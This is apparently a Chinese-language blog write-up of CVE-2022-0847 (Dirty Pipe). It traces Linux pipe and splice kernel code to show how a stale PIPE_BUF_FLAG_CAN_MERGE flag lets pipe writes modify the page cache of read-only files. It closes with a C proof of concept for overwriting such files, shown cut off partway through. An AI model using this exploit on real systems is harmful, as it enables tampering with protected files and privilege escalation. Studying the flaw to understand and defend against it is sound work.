CVE-2022-0847漏洞复现

page cache

首先取自linux官方文档对于page cache的解释

物理内存是易失性的，将数据导入内存的常见情况是从文件中读取数据。每当读取文件时，数据都会放入page cache中，以避免在后续读取时进行昂贵的磁盘访问。同样，当写入文件时，数据被放置在page cache中，并最终进入后备存储设备。写入的页面被标记为脏页面，当 Linux 决定将它们重用于其他目的时，它会确保将设备上的文件内容与更新的数据同步。

pipe系列

在我们申请到一个pipe管道后,他们在内存当中大致呈以下局面

                                                         struct file
                                                     +----------------+
                                                     |                |
                                          +--------->|                |
                                          |          +----------------+
                                          |          | *private_data  +-----------------------------------+
                                          |          |                |                                   |
                                          |          +----------------+                                   |
                                          |     +----+      *f_op     |                                   |
                                          |     |    |                |                                   |
                                          |     |    +----------------+                                   |
     Userland                             |     |    |    *f_inode    +--+                                |     struct pipe_inode_info
                                          |     |    |                |  |                                |
+-----------------+-----------------+     |     |    +----------------+  |    struct inode                |        +------------+
|      fd[0]      |     files[0]    +-----+     |    |                |  +-->+------------+               +------->|            |           +-------------+
|                 |       read      |           |    +----------------+  |   |   *i_op    +----+          |        +------------+      +--->| pipe_buffer |
+-----------------+-----------------+           |                        |   |            |    |          |        |            |      |    +-------------+
|      fd[1]      |     files[1]    +-----+     |                        |   +------------+    |          |        +------------+      |    | pipe_buffer |
|                 |       write     |     |     |        struct file     |   |   ......   |    |          |        |            |      |    +-------------+
+-----------------+-----------------+     |     |    +----------------+  |   |            |    |          |        +------------+      |    | ........... |
                                          +-----|--->|                |  |   +------------+    |          |        |   *bufs    +------+    +-------------+
                                                |    |                |  |   |   i_pipe   +----|----------+        +------------+           | pipe_buffer |
                                                |    +----------------+  |   |            |    |                   |            |           +-------------+
                                                |    | *private_data  |  |   +------------+    |                   +------------+
                                                |    |                |  |   |   ......   |    |                   +------------+
                                                |    +----------------+  |   |            |    |
                                                +----+      *f_op     |  |   +------------+    |
                                                |    |                |  |                     |
                                                |    +----------------+  |                     |            +------------------------------------------------+
                                                |    |    *f_inode    |  |                     |            | const struct file_operations pipefifo_fops = { |
                                                |    |                +--+                     |            |     .open       = fifo_open,                   |
                                                |    +----------------+                        |            |     .llseek     = no_llseek,                   |
                                                |    |                |                        |            |     .read_iter  = pipe_read,                   |
                                                |    +----------------+                  +-----+------------+     .write_iter = pipe_write,                  |
                                                |                                        |                  |     .poll       = pipe_poll,                   |
                                                |                                        |                  |     .unlocked_ioctl = pipe_ioctl,              |
                                                |                                        |                  |     .release    = pipe_release,                |
                                                |                                        |                  |     .fasync     = pipe_fasync,                 |
                                                |                                        |                  |     .splice_write   = iter_file_splice_write,  |
                                                +----------------------------------------+                  | };                                             |
                                                                                                            +------------------------------------------------+

pipe_inode_info

位于 include/linux/pipe_fs_i.h

58 struct pipe_inode_info {
59     struct mutex mutex;
60     wait_queue_head_t rd_wait, wr_wait;
61     unsigned int head; 			//写入pipe时所指向的bufs的下标
62     unsigned int tail; 			//读出pipe时所指向的bufs的下标
63     unsigned int max_usage; 	//bufs最多包含的pipe_buffer
64     unsigned int ring_size; 	//目前总共的pipe_buffer数量,默认0x10,可以通过fcntl(F_SETPIPE_SZ)进行修改,但是需为2的幂次
65 #ifdef CONFIG_WATCH_QUEUE
66     bool note_loss;
67 #endif
68     unsigned int nr_accounted; 	
69     unsigned int readers; 		//目前读者数目
70     unsigned int writers; 		//目前写者数目
71     unsigned int files; 		//映射到该pipe_inode_info的file数目
72     unsigned int r_counter;
73     unsigned int w_counter;                                                                         
74     unsigned int poll_usage;
75     struct page *tmp_page;
76     struct fasync_struct *fasync_readers;
77     struct fasync_struct *fasync_writers;
78     struct pipe_buffer *bufs; 	//struct pipe_buffer数组
79     struct user_struct *user; 	//创建该pipe的用户
80 #ifdef CONFIG_WATCH_QUEUE
81     struct watch_queue *watch_queue;
82 #endif
83 };

pipefifo_fops

位于 fs/pipe.c,这里是pipe管道文件对应的虚函数表

1218 const struct file_operations pipefifo_fops = {
1219     .open       = fifo_open,
1220     .llseek     = no_llseek,
1221     .read_iter  = pipe_read,                                                           
1222     .write_iter = pipe_write,
1223     .poll       = pipe_poll,
1224     .unlocked_ioctl = pipe_ioctl,
1225     .release    = pipe_release,
1226     .fasync     = pipe_fasync,
1227     .splice_write   = iter_file_splice_write,
1228 };

pipe_write

一步一步分析pipe_write

415 static ssize_t
416 pipe_write(struct kiocb *iocb, struct iov_iter *from)                                  
417 {   
418     struct file *filp = iocb->ki_filp;
419     struct pipe_inode_info *pipe = filp->private_data;
420     unsigned int head;
421     ssize_t ret = 0;
422     size_t total_len = iov_iter_count(from);
423     ssize_t chars;
424     bool was_empty = false;
425     bool wake_next_writer = false;
......
446     /*
447      * If it wasn't empty we try to merge new data into
448      * the last buffer.
449      *
450      * That naturally merges small writes, but it also
451      * page-aligns the rest of the writes for large writes
452      * spanning multiple pages.
453      */
454     head = pipe->head;
455     was_empty = pipe_empty(head, pipe->tail); 	//判断pipe是否现在内容为空
456     chars = total_len & (PAGE_SIZE-1); //total_len为我们想总共写入的字节数
457     if (chars && !was_empty) { 		//当为空就不会走这里,这里是如果本次指向的head还有空闲空间,则会用它来进行写入
458         unsigned int mask = pipe->ring_size - 1; 
459         struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
460         int offset = buf->offset + buf->len; 	//偏移是指该pipe_buffer所指向的page页面中的偏移,这里再加上len就可以得到即将写入的位置
461 
462         if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
463             offset + chars <= PAGE_SIZE) {
464             ret = pipe_buf_confirm(pipe, buf);
465             if (ret)
466                 goto out;
467 
468             ret = copy_page_from_iter(buf->page, offset, chars, from);
469             if (unlikely(ret < chars)) {
470                 ret = -EFAULT;
471                 goto out;
472             }
473 
474             buf->len += ret; 		//这里将len+我们刚刚写入的值
475             if (!iov_iter_count(from))
476                 goto out;
477         }
478     }

简述一下上面的步骤:

检查整个pipe所指向buffer的空间,这里检查我们想要传入的总字节数 total_len,然后计算 chars,也就是总字节数对 PAGE_SIZE 取余的结果
这里来判断offset + chars会不会超过该head buffer所指向的页面界限,并且判断buf->flags是否带有 PIPE_BUF_FLAG_CAN_MERGE参数,满足两个条件就进行下面buffer的复制

然后如果没有进行一个初始的边角料拷贝,或者说拷完了,下面的代码继续运行,是一个大的for循环

480     for (;;) {
481         if (!pipe->readers) {
482             send_sig(SIGPIPE, current, 0);
483             if (!ret)
484                 ret = -EPIPE;
485             break;
486         }
487 
488         head = pipe->head;
				/* 查看bufs是否已经用完,未用完则进入if的内容,否则跳过 */
489         if (!pipe_full(head, pipe->tail, pipe->max_usage)) { 	
490             unsigned int mask = pipe->ring_size - 1;
491             struct pipe_buffer *buf = &pipe->bufs[head & mask];  //获取写入的bufs数组下标                      
492             struct page *page = pipe->tmp_page;
493             int copied;
494 
495             if (!page) {
496                 page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); 	//如果pipe没有cache页面,则分配
497                 if (unlikely(!page)) {
498                     ret = ret ? : -ENOMEM;
499                     break;
500                 }
501                 pipe->tmp_page = page;
502             }
503 
504             /* 在 bufs ring中分配一个slot并且连接在空的pipe_buffer上
505              * If we fault or otherwise fail to use
506              * it, either the reader will consume it or it'll still
507              * be there for the next write.
508              */
509             spin_lock_irq(&pipe->rd_wait.lock);
510 
511             head = pipe->head;
512             if (pipe_full(head, pipe->tail, pipe->max_usage)) {
513                 spin_unlock_irq(&pipe->rd_wait.lock);
514                 continue;
515             }
516 
517             pipe->head = head + 1;
518             spin_unlock_irq(&pipe->rd_wait.lock);
519 
520             /* Insert it into the buffer array */
521             buf = &pipe->bufs[head & mask];
522             buf->page = page;
523             buf->ops = &anon_pipe_buf_ops; 	//pipe_buffer的回调函数
524             buf->offset = 0;
525             buf->len = 0;
526             if (is_packetized(filp)) 		//查看是否设置文件的flags O_DIRECT
527                 buf->flags = PIPE_BUF_FLAG_PACKET;
528             else
529                 buf->flags = PIPE_BUF_FLAG_CAN_MERGE;             //未设置则置该标志位             
530             pipe->tmp_page = NULL;
531 
532             copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
533             if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
534                 if (!ret)
535                     ret = -EFAULT;
536                 break;
537             }
538             ret += copied;
539             buf->offset = 0;
540             buf->len = copied;
541 
542             if (!iov_iter_count(from))
543                 break;
544         }
545 			/* 走到这里说明pipe bufs中的page页面用完了 */
546         if (!pipe_full(head, pipe->tail, pipe->max_usage))
547             continue;
548 
549         /* Wait for buffer space to become available. */
550         if (filp->f_flags & O_NONBLOCK) {
551             if (!ret)
552                 ret = -EAGAIN;
553             break;
554         }
555         if (signal_pending(current)) {
556             if (!ret)
557                 ret = -ERESTARTSYS;
558             break;
559         }
560 
561         /*
562          * We're going to release the pipe lock and wait for more
563          * space. We wake up any readers if necessary, and then
564          * after waiting we need to re-check whether the pipe
565          * become empty while we dropped the lock.
566          */
567         __pipe_unlock(pipe);
568         if (was_empty)
569             wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
570         kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
571         wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
572         __pipe_lock(pipe);
573         was_empty = pipe_empty(pipe->head, pipe->tail);
574         wake_next_writer = true;
575     }
.......

这里的for循环是整个pipe_write部分的核心,它承担了剩下的大部分拷贝,会不断检查pipe->bufs的充盈程度,一旦有空闲则会申请新的page来拷贝我们从用户区传入的数据。如果我们创建pipe的时候没有设置标识 O_DIRECT,则每个新启用的pipe_buffer的flags都会被置为 PIPE_BUF_FLAG_CAN_MERGE

pipe_read

pipe_read函数大部分就是从上述的环形buffer当中读出数据,然后修改pipe_buffer以及 pipe_inode_info 相对应的部分,值得注意的一点就是其中对于读出完毕的pipe_buffer的flags字段并没有修改,所以当我们pipe_write之后,buf->flags中始终会有该标识位 PIPE_BUF_FLAG_CAN_MERGE

splice系统调用

先看看手册中的描述

splice()  moves  data  between  two file descriptors without copying between kernel address space and user address space.  It transfers up to len bytes of data from the file descriptor fd_in to the file descriptor fd_out, where one of the file descriptors must refer to a pipe.

大致意思是该系统调用在两个文件描述符之间移动数据,而不需要在内核地址空间与用户地址空间之间进行拷贝。它至多可以从 fd_in 文件描述符向 fd_out 传输 len 字节的数据,值得注意的是这两个文件描述符中至少要有一个引用管道

/* 这里有几条规则是传入参数需要遵守的
 * 1.如果fd_in为pipe,则off_in必须要是NULL;
 * 2.如果fd_in不是pipe,且off_in是NULL,则从fd_in当前的file offset开始读取,读取完毕后file offset会被相应地更新
 * 3.如果fd_in不是pipe,且off_in非空,则off_in必须指向一个保存起始偏移的变量,读取将从该偏移开始,这种情况下fd_in的file offset不会改变
 * 4.上述的fd_in与off_in的规则同样作用于fd_out与off_out
*/
ssize_t splice(int fd_in, off_t *_Nullable off_in,
                      int fd_out, off_t *_Nullable off_out,
                      size_t len, unsigned int flags);

似乎是有九种传参组合

fd_in	off_in	fd_out	off_out	Right/Wrong
pipe	NULL	pipe	NULL	:white_check_mark:
pipe	NULL	file	NULL	:white_check_mark:
pipe	NULL	file	buffer	:white_check_mark:
file	NULL	pipe	NULL	:white_check_mark:
file	NULL	file	NULL	:x:
file	NULL	file	buffer	:x:
file	buffer	pipe	NULL	:white_check_mark:
file	buffer	file	NULL	:x:
file	buffer	file	buffer	:x:

由于有着至少一个pipe的规定,所以最终能正确执行的就只有五种情况

然后我们来看系统调用源码

1332 SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
1333         int, fd_out, loff_t __user *, off_out,
1334         size_t, len, unsigned int, flags)
1335 {
1336     struct fd in, out;
1337     long error;
1338 
1339     if (unlikely(!len))
1340         return 0;
1341 
1342     if (unlikely(flags & ~SPLICE_F_ALL))
1343         return -EINVAL;
1344 
1345     error = -EBADF;
1346     in = fdget(fd_in); 	
1347     if (in.file) {
1348         out = fdget(fd_out);
1349         if (out.file) {
1350             error = __do_splice(in.file, off_in, out.file, off_out,
1351                         len, flags);
1352             fdput(out);
1353         }
1354         fdput(in);
1355     }
1356     return error;
1357 }

基本没有什么好说的,直接看 __do_splice

1116 static long __do_splice(struct file *in, loff_t __user *off_in,
1117             struct file *out, loff_t __user *off_out,
1118             size_t len, unsigned int flags)
1119 {
1120     struct pipe_inode_info *ipipe;
1121     struct pipe_inode_info *opipe;
1122     loff_t offset, *__off_in = NULL, *__off_out = NULL;
1123     long ret;
1124 
1125     ipipe = get_pipe_info(in, true);
1126     opipe = get_pipe_info(out, true);
1127 
1128     if (ipipe && off_in)
1129         return -ESPIPE;
1130     if (opipe && off_out)
1131         return -ESPIPE;
1132 	 /* 由上面的规律统计可知,这里我们至多只会有一个off_*非空,所以不用担心重写入的问题 */
1133     if (off_out) {
1134         if (copy_from_user(&offset, off_out, sizeof(loff_t))) 	//从用户off_out拷贝数据到&offset
1135             return -EFAULT;
1136         __off_out = &offset;
1137     }
1138     if (off_in) {
1139         if (copy_from_user(&offset, off_in, sizeof(loff_t))) 	//从用户off_in拷贝数据到&offset
1140             return -EFAULT;                                                                                                                                                             
1141         __off_in = &offset;
1142     }
1143 	 /* 这里传入的__off_in和__off_out至多只会有一个指针非空 */
1144     ret = do_splice(in, __off_in, out, __off_out, len, flags);
1145     if (ret < 0)
1146         return ret;
1147 
1148     if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t)))
1149         return -EFAULT;
1150     if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t)))
1151         return -EFAULT;
1152 
1153     return ret;
1154 }

这里仅仅也只是判断了一下你传递的参数的正确性,然后如果某个off_*不为空,则需要将其拷贝到内核空间 :)

do_splice

然后调用 do_splice函数,该函数比较长,因此我们分开讲解,这里首先分成几种情况,分别是:

in和out均为pipe
in为pipe,out为普通文件
in为普通文件,out为pipe

1025 /*      
1026  * Determine where to splice to/from.
1027  */ 
1028 long do_splice(struct file *in, loff_t *off_in, struct file *out,
1029            loff_t *off_out, size_t len, unsigned int flags)
1030 {
1031     struct pipe_inode_info *ipipe;
1032     struct pipe_inode_info *opipe;
1033     loff_t offset;
1034     long ret;
1035 
1036     if (unlikely(!(in->f_mode & FMODE_READ) ||
1037              !(out->f_mode & FMODE_WRITE)))
1038         return -EBADF;
1039 
1040     ipipe = get_pipe_info(in, true);
1041     opipe = get_pipe_info(out, true);
1042 	 /* 如果in和out都是pipe */
1043     if (ipipe && opipe) {
1044         if (off_in || off_out) 	//二段检查
1045             return -ESPIPE;
1046 
1047         /* 如果说我们使用pipe的读写文件描述符们来调用splice可能是十分有趣的, 但是就不准就不准就不准 :) */
1048         if (ipipe == opipe)
1049             return -EINVAL;
1050 
1051         if ((in->f_flags | out->f_flags) & O_NONBLOCK)
1052             flags |= SPLICE_F_NONBLOCK;
1053 
1054         return splice_pipe_to_pipe(ipipe, opipe, len, flags);
1055     }
    	......

:one: pipe_to_pipe

可以看到上面的do_splice函数碰到两个pipe,则会调用 splice_pipe_to_pipe函数,该函数主要是复制了pipe_buffer,将inpipe的pipe_buffer内容复制给了outpipe的pipe_buffer,

1434 /* 
1435  * Splice contents of ipipe to opipe.
1436  */
1437 static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
1438                    struct pipe_inode_info *opipe,
1439                    size_t len, unsigned int flags)
1440 {
1441     struct pipe_buffer *ibuf, *obuf;
1442     unsigned int i_head, o_head;
1443     unsigned int i_tail, o_tail;
1444     unsigned int i_mask, o_mask;
1445     int ret = 0;
1446     bool input_wakeup = false;
		 .......
1511         ibuf = &ipipe->bufs[i_tail & i_mask];
1512         obuf = &opipe->bufs[o_head & o_mask];
1513 
1514         if (len >= ibuf->len) {
1515             /*
1516              * Simply move the whole buffer from ipipe to opipe
1517              */
1518             *obuf = *ibuf;
1519             ibuf->ops = NULL;
1520             i_tail++;
1521             ipipe->tail = i_tail;
1522             input_wakeup = true;
1523             o_len = obuf->len;
1524             o_head++;
1525             opipe->head = o_head;
1526         } else {
1527             /*
1528              * Get a reference to this pipe buffer,
1529              * so we can copy the contents over.
1530              */
1531             if (!pipe_buf_get(ipipe, ibuf)) {
1532                 if (ret == 0)
1533                     ret = -EFAULT;
1534                 break;
1535             }
1536             *obuf = *ibuf;
       	 	 ......

这里我们返回到do_splice,说下一个if判断

注意这里是 do_splice剩下的部分代码,

1057     if (ipipe) {
1058         if (off_in)
1059             return -ESPIPE;
1060         if (off_out) {
1061             if (!(out->f_mode & FMODE_PWRITE))
1062                 return -EINVAL;
1063             offset = *off_out;
1064         } else {
1065             offset = out->f_pos;
1066         }
1067 
1068         if (unlikely(out->f_flags & O_APPEND))
1069             return -EINVAL;
1070 
1071         ret = rw_verify_area(WRITE, out, &offset, len); 	//查看是否越界
1072         if (unlikely(ret < 0))
1073             return ret;
1074 
1075         if (in->f_flags & O_NONBLOCK)
1076             flags |= SPLICE_F_NONBLOCK;
1077 
1078         file_start_write(out);
1079         ret = do_splice_from(ipipe, out, &offset, len, flags);
1080         file_end_write(out);
1081 
1082         if (!off_out)
1083             out->f_pos = offset;
1084         else
1085             *off_out = offset;
1086 
1087         return ret;                                                                                                                                                                     
1088     }

:two: pipe_to_file

然后我们查看do_splice_from函数,这是第二种情况的判断

762 static long do_splice_from(struct pipe_inode_info *pipe, struct file *out,                                
763                loff_t *ppos, size_t len, unsigned int flags)
764 {   
765     if (unlikely(!out->f_op->splice_write))
766         return warn_unsupported(out, "write");
767     return out->f_op->splice_write(pipe, out, ppos, len, flags);
768 }

这里调用到splice_write函数,他在普通文件当中的初始化函数指针指向iter_file_splice_write,大意是将ipipe的即将复制pipe_buffer中指向的page页指针赋值给一个bio_vec数组,他的结构如下:

32 struct bio_vec {                                                                                           
33     struct page *bv_page;
34     unsigned int    bv_len;
35     unsigned int    bv_offset;
36 };

然后之后调用vfs_iter_write写入文件buffer

:three: file_to_pipe

然后是最后一部分的do_splice,也是咱们本次漏洞的重点

 if (opipe) {
1091         if (off_out)
1092             return -ESPIPE;
1093         if (off_in) {
1094             if (!(in->f_mode & FMODE_PREAD))
1095                 return -EINVAL;
1096             offset = *off_in;
1097         } else {
1098             offset = in->f_pos;
1099         }
1100 
1101         if (out->f_flags & O_NONBLOCK)
1102             flags |= SPLICE_F_NONBLOCK;
1103 
1104         ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
1105         if (!off_in)
1106             in->f_pos = offset;
1107         else
1108             *off_in = offset;
1109 
1110         return ret;
1111     }
1112 
1113     return -EINVAL;
1114 }

直接查看splice_file_to_pipe 调用链,这里有个小知识那就是我们要知道某个文件的ops,我们可以直接去查看<name>_file_operations,其中<name>为我们的文件系统名称,例如ext4等等

splice_file_to_pipe
	do_splice_to
		in->f_op->splice_read <==> generic_file_splice_read
			call_read_iter
				in->f_op->read_iter <==> generic_file_read_iter

好我们链条就先到这里,先查看该函数,下面是内核开发者对该函数作出的解释

This is the “read_iter()” routine for all filesystems that can use the page cache directly.

2772 generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
2773 {
2774     size_t count = iov_iter_count(iter); 	//返回iter->count,也就是我们复制的字节数
2775     ssize_t retval = 0;
2776 
2777     if (!count)
2778         return 0; /* skip atime */
2779 
2780     if (iocb->ki_flags & IOCB_DIRECT) { 	//看是否文件标识带有O_DIRECT,若有该标识,则绕过cache
2781         struct file *file = iocb->ki_filp;
2782         struct address_space *mapping = file->f_mapping;
2783         struct inode *inode = mapping->host;
2784 
2785         if (iocb->ki_flags & IOCB_NOWAIT) {
2786             if (filemap_range_needs_writeback(mapping, iocb->ki_pos,
2787                         iocb->ki_pos + count - 1))
2788                 return -EAGAIN;
2789         } else {
2790             retval = filemap_write_and_wait_range(mapping,
2791                         iocb->ki_pos,
2792                             iocb->ki_pos + count - 1);
2793             if (retval < 0)
2794                 return retval;
2795         }
2796 
2797         file_accessed(file);
2798 
2799         retval = mapping->a_ops->direct_IO(iocb, iter);
2800         if (retval >= 0) {
2801             iocb->ki_pos += retval;
2802             count -= retval;
2803         }
2804         if (retval != -EIOCBQUEUED)
2805             iov_iter_revert(iter, count - iov_iter_count(iter));
2806 
2807         /*
2808          * Btrfs can have a short DIO read if we encounter
2809          * compressed extents, so if there was an error, or if
2810          * we've already read everything we wanted to, or if
2811          * there was a short read because we hit EOF, go ahead
2812          * and return.  Otherwise fallthrough to buffered io for
2813          * the rest of the read.  Buffered reads will not work for
2814          * DAX files, so don't bother trying.
2815          */
2816         if (retval < 0 || !count || IS_DAX(inode))
2817             return retval;
2818         if (iocb->ki_pos >= i_size_read(inode))
2819             return retval;
2820     }
2821 
2822     return filemap_read(iocb, iter, retval);
2823 }
2824 EXPORT_SYMBOL(generic_file_read_iter);

其中涉及到两个中间变量 iocb和iter,他们两个是在generic_file_splice_read当中进行初始化的,下面分别给出初始化步骤:

iter
iocb

然后我们看到最后调用filemap_read

2642 ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
2643         ssize_t already_read)
2644 {
2645     struct file *filp = iocb->ki_filp; 	//获取in_file文件
2646     struct file_ra_state *ra = &filp->f_ra;
2647     struct address_space *mapping = filp->f_mapping; //查看文件映射部分
2648     struct inode *inode = mapping->host; 	//获取in_file对应的inode
2649     struct folio_batch fbatch;
2650     int i, error = 0;
2651     bool writably_mapped;
2652     loff_t isize, end_offset;
2653 
		 ...
2661 
2662     do {
2663         cond_resched();
2664 
2665         /*
2666          * If we've already successfully copied some data, then we
2667          * can no longer safely return -EIOCBQUEUED. Hence mark
2668          * an async read NOWAIT at that point.第一次already_read=0
2669          */
2670         if ((iocb->ki_flags & IOCB_WAITQ) && already_read)
2671             iocb->ki_flags |= IOCB_NOWAIT;
2672 
2673         if (unlikely(iocb->ki_pos >= i_size_read(inode)))
2674             break;
2675 
2676         error = filemap_get_pages(iocb, iter, &fbatch);
 			 ...
2727             copied = copy_folio_to_iter(folio, offset, bytes, iter);
2728 
2729             already_read += copied;
2730             iocb->ki_pos += copied;
2731             ra->prev_pos = iocb->ki_pos;
2732 
			 ...
2743 
2744     file_accessed(filp);
2745 
2746     return already_read ? already_read : error;
2747 }
2748 EXPORT_SYMBOL_GPL(filemap_read);

在该函数当中,我们会将数据从page cache复制到管道,这里并没有真正的进行逐字节复制.在一个dowhile的大循环当中,主要通过调用copy_folio_to_iter来复制chunks

这里给出folio发布的官方解释,这样看来folio似乎是一个用来给复合页机制带来的歧义提供的解决办法,但我看到后面似乎并不受欢迎,但是由于现在替代方案较少,所以暂时将就着用吧:)

可以得出一个结论,我们在这里可以大致将folio类比为page,这对我们接下来的理解并没有任何影响,而copy_folio_to_iter实际上也仅仅是调用了copy_page_to_iter

我们来查看copy_page_to_iter函数调用链,根据文件的类型会有以下的情况

1
2
3

copy_page_to_iter
	__copy_page_to_iter
		copy_page_to_iter_pipe

382 static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
383              struct iov_iter *i)
384 {
385     struct pipe_inode_info *pipe = i->pipe;
386     struct pipe_buffer *buf;
387     unsigned int p_tail = pipe->tail;
388     unsigned int p_mask = pipe->ring_size - 1;
389     unsigned int i_head = i->head;
390     size_t off;
391 
392     if (unlikely(bytes > i->count))
393         bytes = i->count;
394 
395     if (unlikely(!bytes))
396         return 0;
397 
398     if (!sanity(i))
399         return 0;
400 
401     off = i->iov_offset;
402     buf = &pipe->bufs[i_head & p_mask]; 	//获取pipe的head指向的pipe_buffer
403     if (off) {
404         if (offset == off && buf->page == page) {
405             /* merge with the last one */
406             buf->len += bytes;
407             i->iov_offset += bytes;
408             goto out;
409         }
410         i_head++;
411         buf = &pipe->bufs[i_head & p_mask];
412     }
413     if (pipe_full(i_head, p_tail, pipe->max_usage))
414         return 0;
415 
416     buf->ops = &page_cache_pipe_buf_ops;
417     //     buf->flags = 0;             这里需要我们手动将该行注释掉,然后再编译内核
418     get_page(page);
419     buf->page = page;
420     buf->offset = offset;
421     buf->len = bytes;
422 
423     pipe->head = i_head + 1;
424     i->iov_offset = offset + bytes;
425     i->head = i_head;
426 out:
427     i->count -= bytes;
428     return bytes;                
429 }

我们可以看到这里并没有发生实际上的数据拷贝,而仅仅是page页面指针的改写,当文章写到这里我发现5.17.9的linux内核此时已经将该漏洞进行修复,所以这里我手动将其恢复到漏洞版本

漏洞利用

我们现在知道了漏洞点,那就是在我们使用splice系统调用来进行零拷贝时,从file拷贝到pipe其中的一个buffer时并没有初始化其中的标识位,也就是pipe_buffer->flags字段,因此该pipe_buffer上一次使用时遗留的flags会被原样保留。
此时如果flags中存在PIPE_BUF_FLAG_CAN_MERGE,那么我们下次在写入该buffer的时候将从该pipe_buffer的offset+len开始写,但是此时注意,经过splice的零拷贝,我们的pipe_buffer是指向pagecache的,所以这里导致我们可以直接修改pagecache当中的页面,且根本不会去考虑该文件是否可写。

所以本次漏洞利用分为以下几个步骤:

分配pipe以及其中的buffer
首先向其中灌入大量无意义数据,再依次排空,由于读并不会修改我们的标识,所以这样使得我们每个pipe_buffer都会带有PIPE_BUF_FLAG_CAN_MERGE标识
splice系统调用,将不可写的文件数据内容”拷贝”到pipe当中
我们将对于pipe的写转化为了对于不可写文件所映射到的pagecache的写

下面是漏洞的poc以及演示

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define PAGE_SIZE 0x1000

/* Create a pipe in my_pipe[0] / my_pipe[1] and request a one-page pipe size on my_pipe[1]. */
void initial_pipe(int *my_pipe);
/* Write 0x41 bytes to my_pipe[1], in chunks of at most PAGE_SIZE, until the size reported by F_GETPIPE_SZ has been written. */
void fill_pipe(int *my_pipe);
/* Read from my_pipe[0], in chunks of at most PAGE_SIZE, until the size reported by F_GETPIPE_SZ has been read back. */
void drain_pipe(int *my_pipe);
/* Close both descriptors stored in my_pipe. */
void free_env(int *my_pipe);

/*
 * Debugging aid: print a colored "Debugging Here" marker on stdout and
 * then block until one character can be read from stdin.
 */
void debug(){
    fputs("[\033[5;33m!\033[0m]\033[32mDebugging Here\033[0m\n", stdout);
    (void)getchar();
}

/*
 * Usage: <our_poc> <vuln_file> <offset> <payload>
 *
 * Prepares a pipe (create, fill, drain), opens <vuln_file> read-only,
 * splices one byte of it at <offset> into the pipe and then writes
 * <payload> to the pipe's write end.
 *
 * argv[2] is parsed as a decimal offset; a value <= 0 falls back to the
 * file size reported by fstat(). Exits with status 1 on any failure.
 */
int main(int argc, char ** argv)
{
    int my_pipe[2] = {0};
    int fd_read = 0;
    struct stat file_st;
    off_t offset = 0;
    long long requested = 0;
    char *end = NULL;
    size_t payload_len = 0;
    ssize_t nr = 0;

    if(argc < 4){
        printf("[x]The poc's right use is: \n<our_poc> <vuln_file> <offset> <payload>\n");
        puts("[?]len < 0 will read the hole file...");
        exit(1);
    }
    puts("[+]Initial the pipe...");
    initial_pipe(my_pipe);

    puts("[+]Fill the pipe...");
    fill_pipe(my_pipe);

    puts("[+]drain the pipe...");
    drain_pipe(my_pipe);

    fd_read = open(argv[1], O_RDONLY);

    if(fd_read < 0){
       perror("open vuln file failed!");
       exit(1);
    }
    if(fstat(fd_read, &file_st) < 0){
        perror("stat file failed!");
        exit(1);
    }

    /* Parse the numeric value of argv[2]; comparing the pointer itself
     * against 0 (as before) is always true and never reaches the fallback. */
    requested = strtoll(argv[2], &end, 10);
    if(end == argv[2] || *end != '\0'){
        fprintf(stderr, "[x]Invalid offset: %s\n", argv[2]);
        exit(1);
    }
    if(requested > 0)
        offset = (off_t)requested;
    else
        offset = file_st.st_size;
    printf("%lld\n", (long long)offset);

    /* splice() takes an off_t * for the file offset; pass the variable
     * directly instead of casting an unrelated integer type. */
    nr = splice(fd_read, &offset, my_pipe[1], NULL, 1, 0);
    if(nr < 0){
        perror("splice fd to pipe");
        exit(1);
    }
    if(nr == 0){
        /* Nothing was spliced (e.g. offset at or past end of file), so the
         * pipe holds no page from the file; do not report success. */
        fprintf(stderr, "[x]splice returned no data at offset %lld\n", (long long)offset);
        exit(1);
    }
    puts("[+]We successfully execute the splice...");

    /* sizeof(argv[3]) is the size of a pointer; the payload length is
     * the length of the string it points to. */
    payload_len = strlen(argv[3]);
    if(write(my_pipe[1], argv[3], payload_len) < 0){
        perror("write failed");
        exit(1);
    }

    free_env(my_pipe);
    close(fd_read);
    return 0;
}


/*
 * Create the pipe and request a capacity of one page.
 *
 * my_pipe: array of two ints that receives the descriptors from pipe().
 *
 * Exits with status 1 if the pipe cannot be created, since my_pipe would
 * otherwise hold no usable descriptors. A failed F_SETPIPE_SZ is only
 * reported: fill_pipe() and drain_pipe() query the actual size with
 * F_GETPIPE_SZ themselves.
 */
void initial_pipe(int *my_pipe){
    if(pipe(my_pipe) < 0){
        perror("pipe failed");
        exit(1);
    }
    if(fcntl(my_pipe[1], F_SETPIPE_SZ, 1*PAGE_SIZE) < 0)
        perror("F_SETPIPE_SZ failed");
}

/*
 * Write 0x41 bytes into the pipe's write end until as many bytes as the
 * pipe size reported by F_GETPIPE_SZ have been written.
 *
 * my_pipe: descriptor pair; my_pipe[1] is queried and written to.
 *
 * Exits with status 1 if the size query or a write fails. Previously a
 * -1 return was subtracted from the remaining count, which made it grow
 * and the loop never terminate.
 */
void fill_pipe(int *my_pipe){
    char buffer[PAGE_SIZE];
    int pipe_size = fcntl(my_pipe[1], F_GETPIPE_SZ);
    ssize_t nr = 0;

    if(pipe_size < 0){
        perror("F_GETPIPE_SZ failed");
        exit(1);
    }
    printf("[*]pipe_size is %d\n", pipe_size);
    memset(buffer, 0x41, sizeof(buffer));
    while(pipe_size > 0){
        size_t chunk = (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size);

        nr = write(my_pipe[1], buffer, chunk);
        if(nr < 0){
